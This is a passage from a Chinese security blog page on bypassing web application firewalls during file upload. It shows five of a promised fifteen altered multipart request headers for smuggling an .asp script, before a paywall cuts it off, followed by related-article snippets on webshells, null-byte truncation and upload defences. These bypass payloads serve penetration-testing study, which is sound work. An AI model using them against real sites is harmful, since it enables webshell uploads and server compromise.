文件上传绕过waf的方法

最新推荐文章于 2025-06-30 15:35:43 发布

原创

最新推荐文章于 2025-06-30 15:35:43 发布 · 776 阅读

8 ·

CC 4.0 BY-SA版权

文章标签：

#安全

本文介绍了15种绕过Web应用防火墙（WAF）的文件上传方法，包括利用特殊字符、空格、换行、文件名变异、多Content-Disposition等技巧，旨在探讨安全防护中的潜在风险。

原始请求包：
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”

Content-Type: text/html

方法1，文件名前缀加[0x09]绕过：
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”[0x09]cesafe.asp”

Content-Type: text/html

方法2，文件名去掉双引号绕过：
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=cesafe.asp

Content-Type: text/html

方法3，添加一个filename1的文件名参数，并赋值绕过：
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”;filename1=”test.jpg”

Content-Type: text/html

方法4，form变量改成f+orm组合绕过：
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: f+orm-data; name=”filepath”;filename=”cesafe.asp”

Content-Type: text/html

方法5，文件名后缀大小写绕过：
——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Di

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

licheric

关注关注

0
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

45-1 waf绕过 - 文件上传绕过WAF方法

weixin_43263566的博客

06-04

592

打开dvwa靶场，先将靶场的安全等级调低，然后切换到文件上传。

文件上传之waf绕过方式方法汇总超详细持续更新

盾悟

02-03

7793

部分 WAF 仅检查最后一个扩展名，而服务器可能解析第一个有效扩展名（如 Apache 解析顺序漏洞）。→ Apache 可能解析为 PHP 文件（需配置漏洞）。：Windows 系统特性（如 NTFS 流）、空格截断。：WAF 检测文件开头特征，但服务器忽略注释。：暴力破解扩展名或 Content-Type。：将恶意代码嵌入 GIF 动画的注释或帧中。（PHP 5.3.4 之前版本可能有效）。→ IIS 可能解析为 ASP 文件。：自动化测试文件上传漏洞。（注入恶意元数据）。

参与评论您还未登录，请先登录后发表或查看评论

上传绕过WAF的tips大全

weixin_30855761的博客

07-20

262

原始默认状态： ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp” Content-Type: text/html 突破0，文件名前缀加[0x09]绕过： ——WebKitFormBoundary2smpsxF...

WAF绕过之文件上传

Williamanddog的博客

02-05

1421

我们上传1.txt文件，抓包修改content-type为：application/octet-stream。那我们通过hackbar来验证，利用免杀一句话木马成功执行命令。接下来我们在判断是否是通过content-type来进行拦截。修改了1.txt的content-type也可以成功上传。所以可以判断，WAF是根据文件名后缀来进行拦截的。我们在请求包中插入足够多的无用数据，成功上传。但是我们并不知道waf拦截我们的机制。我们访问上传的一句话木马被拦截。我们上传一个一句话木马，被拦截。

文件上传之waf绕过和安全维护

硫酸超的博客

08-12

442

文件上传之waf绕过和安全维护上传参数名解析常见绕过方法数据溢出-防匹配(xxx...)符号变异-防匹配(' " ; )数据截断-防匹配(%00 ；/换行)重复数据-防匹配(参数多次)fuzz安全修复上传参数名解析明确那些东西能修改？ Contont-Disposition：一般可更改 name：表单参数值，不能更改 Filename：文件名，上传的文件，可以更改 Content-Type：文件MIME，视情况更改，判断滤机制里面是不是通过这个这个属性值来过滤的见upload-labs-master

上传_waf绕过

weixin_44110913的博客

08-22

1039

匹配规则根据其匹配规则，探测出到底匹配了那些内容主要以文件名前后缀，观察前缀是否没有过滤而过滤了后缀特性根据其本身的特性去绕过服务器特性操作系统特性脚本语言特性绕过安全狗上传文件前后缀绕过空格x.php%00.jpg编码绕过, %00使用burp url编码，使其匹配不到php。但是%00却仍在截断，从而剩下空格x.php,访问%20x.php即可思路匹配不到后缀为php，却可以执行php 绕过演示首先测试文件名左边看是否匹配可以明显的看到左边安全狗也匹配..

文件上传绕过waf

qq_45750691的博客

08-24

712

文件上传绕过waf safedog 绕过方式上传参数解析：明确哪些东西能修改？ content-disposition：一般可更改，就是表单数据 name：表单参数值，不能更改这个值是固定的，不能更改的，这个是和后端绑定的 filename：文件名不能更改这个是最关键的它包含了文件的后缀名 content-type：文件MIME，视情况更改，这是一个绕过条件，我们可以根据它进行绕过，如果对方不是这个绕过条件，就没有意义了常见绕过方法数据溢出-防匹配（xxx…）把数据搞多一点数

文件上传—WAF拦截的绕过方式

qq_56228347的博客

11-24

4311

文件上传—WAF拦截的绕过方式

【WAF Bypass】文件上传绕过waf姿势总结

m0_46103905的博客

06-01

3146

总结了文件上传绕waf的一些姿势，以及针对网站安全狗进行了实战演练。

文件上传绕过WAF：雷池、宝塔、安全狗技巧

最新发布

wcl20010的博客

06-30

1729

WAF会检查上传文件的MIME类型（Content-Type）和文件扩展名，判断是否为可执行文件或恶意文件类型。例如，阻止上传.php.jsp.asp等脚本文件。WAF会对上传文件的内容进行深度分析，通过特征码匹配、沙箱分析等方式，检测文件中是否包含恶意代码（如WebShell特征码）。WAF会检查文件名是否包含特殊字符、双扩展名等异常情况，以防止攻击者通过文件名混淆绕过检测。WAF会分析HTTP请求包的结构，特别是部分的和boundary等字段，确保其符合HTTP协议规范，防止畸形请求绕过。

上传绕过WAF的15中姿势

06-29

绕过WAF进行文件上传的文旦，可以学习一些姿势加以利用。

文件上传--WAF绕过干货

2301_80629787的博客

04-24

1186

绕过WAF上传文件-- 安全狗-- 宝塔。

毕业一年，从事运维感觉没有出路，如何转型更有前景？

Python_0011的博客

07-08

2258

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

文件上传——WAF的基础绕过

mingyqf的博客

04-20

2030

[文件上传——WAF的基础绕过 ] 原文链接：(https://www.cnblogs.com/-chenxs/p/12324425.html) 方法分类： 1、HTTP参数污染绕过 2、HTTP Header头部欺骗绕过 3、HTTP参数溢出绕过 4、HTTP分块传输绕过 5、HTTP数据编码绕过 6、HTTP Pipline绕过(Keep-alive) 7、HTTP协议未覆盖绕过 8、HTTP畸形包绕过 9、HTTP组合绕过 0x01 HTTP参数污染绕过 HTTP参数污染简称HPP 由于http协议允

文件上传与sql注入绕过WAF

dys的博客

06-19

816

文件上传与sql注入绕过waf

假期抢票难？程序员手写一个超强抢票脚本，轻松购得出行票！

jennycisp的博客

12-28

1676

距离寒假过年越来越近了，据央视财经报道，从往年寒假开始，售票通道一打开，热门目的地车票，几乎瞬间售罄。有平台预计，今年过年有望突破2022年同期，达到2亿人次的新高。这样一来，过年出行最大的难题便是如何拥有一张动车票。实际上，我们程序员都是靠实力买到火车票的，比如下面要和大家推荐的这个12306只能刷票助手，这是一个程序员自己写的一个抢票脚本，项目名称就叫——12306。

网络安全-web（9）-文件上传waf绕过

2301_80281749的博客

01-21

1107

利用添加文件头的方法来绕过exif_imagetype，利用.user.ini来绕过黑名单检测，之后再利用<script language="php"></script>来绕过对php文件内容的检测。如果我们访问http://172.16.12.2/uploadfiles/0412c29576c708cf0155e8de242169b1.jpg/.php的话，它就会被当成php解析。说明后端是白名单过滤，只能上传图片，在上传图片后发现，后端还会对文件的MIME类型和文件头进行校验。

如何防止文件上传绕过WAF

05-20

要防止文件上传绕过WAF，可以采取以下措施： 1. 文件扩展名过滤：通过对上传文件的扩展名进行过滤，只允许上传指定类型的文件。同时，需要注意的是，黑名单式的过滤不如白名单式的过滤安全。 2. MIME类型过滤：WAF可以根据文件类型的MIME类型进行过滤，只允许上传指定类型的文件。 3. 禁止上传可执行文件：禁止上传可执行文件，例如.bat、.exe、.sh等文件，可以防止攻击者上传恶意程序。 4. 文件大小限制：可以对上传文件的大小进行限制，以防止上传过大的文件导致服务器崩溃。 5. 随机文件名：将上传文件使用随机生成的名称保存，可以防止攻击者针对特定文件进行攻击。 6. 文件内容检测：对上传文件的内容进行检测，以防止上传包含恶意代码的文件。 7. WAF规则更新：定期更新WAF规则库，以保证WAF能够检测最新的攻击方式。